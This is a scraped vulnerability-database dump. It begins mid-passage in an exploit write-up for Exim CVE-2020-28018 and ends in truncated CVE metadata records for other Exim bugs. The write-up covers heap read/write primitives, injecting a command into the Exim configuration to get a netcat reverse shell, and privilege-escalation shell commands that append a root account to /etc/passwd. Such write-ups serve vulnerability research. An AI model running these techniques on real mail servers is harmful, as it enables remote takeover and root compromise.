`server_corked` still contains a pointer to somewhere in the freed memory.\n\nAnd that memory might be used by other functions since it has been freed... so our `gstring` struct will be corrupted\nwith random binary data.\n\nThis is the result of triggering the UAF:\n\n```\ngef\u27a4 p *corked\n$1 = {\n size = 0x54595c9c, \n ptr = 0xa7e800ba, \n s = 0x7e35043433160bd3 <error: Cannot access memory at address 0x7e35043433160bd3>\n}\ngef\u27a4 p corked\n$2 = (gstring *) 0x555ad3be1b58\ngef\u27a4 \n```\n\nThis is the state of the struct when entering `tls_write()` for our command following the `STARTTLS`.\n\nObviously, as soon as `corked->s` is dereferenced, the result is a SIGSEGV.\n\n# Exploitation\n\nAs mentioned by Qualys, they use three steps to exploit the vulnerability:\n\n1) As the memory is already freed, we can make Exim write heap pointers from structs like `header_line` into our buffer, so when `tls_write()` is called, they will be returned to the user. This way we have a memory leak to continue our exploitation.\n2) Once we know the heap memory addresses, we can craft an arbitrary read primitive to start reading the heap until the Exim configuration is found.\n3) Finally, the last step is to craft a write-what-where primitive. This way we would be able to inject custom configuration into the buffer found in step 2. We can inject `${run{<command>}}`, where `<command>` is any command the attacker would like to execute, like a reverse shell using netcat. 
This configuration will be interpreted by `string_expand()`, and will end up executing the command.\n\n## Controlling the Use-After-Free condition\n\nNice, we were able to trigger the Use-After-Free.\n\nNow we need to take good control over the UAF so we can craft our\nprimitives successfully and reliably.\n\nUnfortunately, after the buffers from `POOL_MAIN` are\nfreed, our block is passed to `free()` directly.\n\nThis means that the memory won't just be reused through `store_get_3()` or\n`store_newblock_3()` but by any function that uses `malloc()`... like\n`CRYPTO_zalloc()` and many more.\n\nIn this case, somewhere in `tls_server_start()`, memory is requested\nthrough `malloc()`.\n\nIt then copies some binary data into it, corrupting our `gstring` struct.\n\nWe need a way to prevent this, so we can reach `tls_write()` with a sane\n`gstring` struct that points to a valid memory address; otherwise a SIGSEGV\nwill be raised.\n\nAfter understanding how the Exim pool allocator works, debugging and trying\nsome commands to see their behaviour on the heap side, we can finally avoid this data being\nwritten into our gstring struct.\n\n## Memory Leak\n\nOnce we have a successful Use-After-Free triggered and no problems with our struct being corrupted,\nwe need to try to shape the heap so that a function writes a heap address in the middle of our string (any position\nbefore `g->ptr`).\n\nWe are lucky: the responses, despite SMTP being a plain-text (not binary) protocol, allow us to send NULL bytes back to the client.\n\nWhy does this happen?\n\nResponses are sent back with `SSL_write()`, which has no problem with NULL bytes.\n\nWhat about strings? `string_catn()` does not truncate at NULL bytes. 
This is because it uses `memcpy` to copy the data.\n\nThe only length limit is `g->ptr`, but as the address is written before the `g->ptr` index,\nall the data up to that index is returned to us, thus leaking precious heap addresses.\n\nResult of leaking memory with the PoC:\n\n\n\n## Arbitrary Read\n\nNow we have uncovered the heap base.\n\nAnd the addresses do not change between connections, so we can now start on the way to RCE.\n\nBut... how do we overwrite the gstring struct?\n\nIt turned out to be pretty straightforward using the Qualys technique.\n\nESMTP added some things to the SMTP protocol, like parameters for MAIL FROM commands.\n\nUsing a big parameter after the last STARTTLS is enough to overwrite the struct :)\n\nResult:\n\n```\ngef\u27a4 p *corked\n$1 = {\n size = 0x42424242, \n ptr = 0x42424242, \n s = 0x4242424242424242 <error: Cannot access memory at address 0x4242424242424242>\n}\n```\n\nFull control over the `gstring` struct.\n\nNow it is time to craft our arbitrary read primitive.\n\nIt appears to be easy: overwrite `g->size` and `g->ptr` with a big value.\n\nThen overwrite `g->s` with the memory address from which we want to read.\n\nOnce the command finishes, `tls_write()` will be called to return data to the user.\n\nAs the string buffer pointer is corrupted and points to an attacker-chosen location, the data from that location will be returned.\n\nWe can now implement a function that iterates over the chunks, reading each one and looking for keywords that tell us whether the chunk\nis the one that holds the Exim configuration; if so, we move on to the last step.\n\nThe function I implemented iterates in `READ_SZ`-length steps along the heap, starting from the heap base.\n\n```\n\t[+] Leaked heap address = 0x55c846683d90\n\t[+] Leaked heap_base = 0x55c8465f4000\n\n[*] Searching for Exim configuration in memory...\n\n[+] Config found at: 0x55c8465f6328\n```\n\nOnce something is found, we move on to the last step.\n\n## 
Write-What-Where\n\nNice! We know the heap base address. And, more interestingly, we know where the Exim configuration is located!\n\nNow it is time to RCE, right? :P\n\nWe now have to (somehow) overwrite the Exim configuration and inject `${run{<command>}}`, so that when `string_expand()` is executed, our command is interpreted and finally we get arbitrary command execution.\n\nThe easiest way to get RCE is using netcat, so just using nc in the command would give us a shell.\n\nBut... how can we craft such a write-what-where primitive?\n\nWe must first overwrite (as we did with the arbitrary read primitive) the `gstring` struct.\n\nOnce we have control over it, we first point `g->s` to the place where we want to write, in this case the Exim configuration address.\n\nThen, when the next response is written to the buffer, it will be written to where `g->s` points :)\n\nBut... how can we corrupt the `gstring` struct and get an arbitrary response at the same time?\n\nQualys did not make this very clear in the advisory.\n\nWe need to make a \"MAIL FROM\" command return arbitrary data.\n\nAfter some tries, I thought the best solution is an error message.\n\nWe can choose `ADDR - strlen(\"501 \")`.\n\nSo those four bytes do not corrupt our target.\n\nHow can we make MAIL FROM fail? I use an invalid sender: as a sender requires a domain, if no domain is specified the error message will contain client-sent data.\n\nBut there is a problem with it. As we are sending NULLs, this message is returned instead: \"501 NUL characters are not allowed in SMTP commands\".\n\nSo there is still no way to control its output, as we need NULLs in the request.\n\nWe cannot send another \"MAIL FROM\" to corrupt responses for the simple reason that once we trigger the UAF, `more` is 0 and there is no access to the freed buffer.\n\nBut from `handle_smtp_call()`, if we send `DATA`, `receive_msg()`. 
We can trick it into not restoring the current pool, so we can groom the heap a bit to overwrite the freed buffer.\n\nOnce we overwrite it, we send a MAIL FROM with invalid data pipelined with a valid one. The response will be written to the `s` pointer.\n\n## Remote Code Execution\n\nOnce we achieved write-what-where, I had problems with netcat directly, as some requirements on the number of arguments were needed. So I did: `/bin/sh -c '<nc command here>'`.\n\nI overwrote the MAIL FROM ACL so that pipelining a second MAIL FROM ends up calling `expand_cstring()`, and finally executing my arbitrary command.\n\nThis is a screenshot once I got a shell with the exploit:\n\n\n\n## Chaining with CVE-2020-28008 LPE\n\n```\n$ /bin/bash\n$ cd /var/spool/exim4/db\n$ rm -f retry*\n$ ln -s -f /etc/passwd retry.passwd\n$ /usr/sbin/exim4 -odf -oep postmaster < /dev/null\n$ # creds => pwner:pwner\n$ echo 'pwner:$6$4KB5snZ5jevx6TFa$VNdvb49sUfHhAQeKCkbpGVDnHUbnNfbpFh.QVjwIqvGlYsyKp8yoYrAfNDcG0XdtoQ2vT9LQPLml6XmCaVCOX/:18757:0:99999:7:::' >> /etc/passwd\n$ su -l pwner\n * Enter pass: pwner *\n# id\nuid=0(root) gid=0(root) groups=0(root)\n#\n```\n\n## System Information\n\nThe tests have been performed on a Debian system:\n\n```\nroot@research:~# lsb_release -a\nNo LSB modules are available.\nDistributor ID:\tDebian\nDescription:\tDebian GNU/Linux 10 (buster)\nRelease:\t10\nCodename:\tbuster\n```\n\nWith Exim version:\n\n```\nroot@research:~# exim --version\nExim version 4.92 #7 built 06-May-2021 19:31:44\nCopyright (c) University of Cambridge, 1995 - 2018\n(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2018\nBerkeley DB: Berkeley DB 5.3.28: (September 9, 2013)\nSupport for: crypteq iconv() OpenSSL DANE DKIM DNSSEC Event OCSP PRDR TCP_Fast_Open\nLookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb passwd\nAuthenticators: cram_md5 plaintext\nRouters: accept dnslookup ipliteral manualroute queryprogram redirect\nTransports: 
appendfile/maildir/mailstore autoreply lmtp pipe smtp\nFixed never_users: 0\nConfigure owner: 0:0\nSize of off_t: 8\nConfiguration file is /var/lib/exim4/config.autogenerated\n```\n\nMy Exim build is self-compiled, but replicates the\ncompilation flags used by the mainstream Debian package.\n\nThe configuration is the same as the Debian default, plus perhaps some\nminor changes.\n\n## Set up Environment\n\nIn this repository, there is a directory called `exim-4.92`. It is the source code for Exim.\n\nFirst install Exim with the apt package manager.\n\nDownload the exim directory and the config directory onto the machine.\n\nFirst copy `config/Makefile` into `exim-4.92/Local`.\nThen copy `config/eximon.conf` into `exim-4.92/Local`.\n\nNow we run `make`; a `build-linux-*` directory will be created. We move into it and replace all the \"-O2\" occurrences with\n\"-O0\".\n\nWe do the same in the `OS/` directory. Finally, in `build-linux-*` we add `-g` to the `CFLAGS` variable.\n\nIt is recommended to add the libc and Exim sources to gdb.\n\nNow `make` and `make install`.\n\n`cp /usr/exim/bin/* /usr/sbin/`\n`cp /usr/sbin/exim /usr/sbin/exim4`\n\nI used this script for generating certs: [https://github.com/volumio/RootFS/blob/master/usr/share/doc/exim4-base/examples/exim-gencert](https://github.com/volumio/RootFS/blob/master/usr/share/doc/exim4-base/examples/exim-gencert)\n\nThen enable TLS in the exim4 configuration at `/etc/exim4`\nand use the `/etc/exim4/exim.crt` and `/etc/exim4/exim.key` generated by the bash script.\n\nFinally: `sudo update-exim4.conf && systemctl restart exim4`\n\nCheck `systemctl status exim4` to see if everything is right.\n\nIf you get a \"TLS not currently available\" error message after trying to `STARTTLS`, check the exim4 logs.\n\nI faced a problem because the key I used for the certs was too short. 
So modify the key bits from the previously mentioned gencert script (I use 4096).\n\n\n## More Information\n\nFor more information visit the [official qualys advisory](https://www.qualys.com/2021/05/04/21nails/21nails.txt)", "cvss3": {}, "published": "2021-05-17T00:00:00", "type": "seebug", "title": "Exim 4 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2020-28018\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-28008", "CVE-2020-28018"], "modified": "2021-05-17T00:00:00", "id": "SSV:99253", "href": "https://www.seebug.org/vuldb/ssvid-99253", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28009", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28009"], "modified": "2021-05-10T19:49:00", "id": "ALPINE:CVE-2020-28009", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28009", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28020", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28020"], "modified": "2022-06-28T14:11:00", "id": "ALPINE:CVE-2020-28020", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28020", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because \"-F ''\" is mishandled by 
parse_fix_phrase.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28016", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-10T18:40:00", "id": "ALPINE:CVE-2020-28016", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. 
Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28008", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-10T20:17:00", "id": "ALPINE:CVE-2020-28008", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28008", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. 
The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28014", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28014"], "modified": "2022-07-12T17:42:00", "id": "ALPINE:CVE-2020-28014", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28014", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). 
Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28026", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2022-07-12T17:42:00", "id": "ALPINE:CVE-2020-28026", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. 
Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28007", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-10T20:17:00", "id": "ALPINE:CVE-2020-28007", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28012", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28012"], "modified": "2022-07-12T17:42:00", "id": "ALPINE:CVE-2020-28012", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28012", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:37", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read. 
smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "alpinelinux", "title": "CVE-2020-28023", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-10T16:15:00", "id": "ALPINE:CVE-2020-28023", "href": "https://security.alpinelinux.org/vuln/CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-23T11:05:36", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. 
This may cause privilege escalation from exim to root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28011", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28011"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28011", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28011", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:54:33", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28025", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28025", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28018", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-05-06T13:15:00", "id": "DEBIANCVE:CVE-2020-28018", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T14:54:32", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "debiancve", "title": "CVE-2020-28007", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, 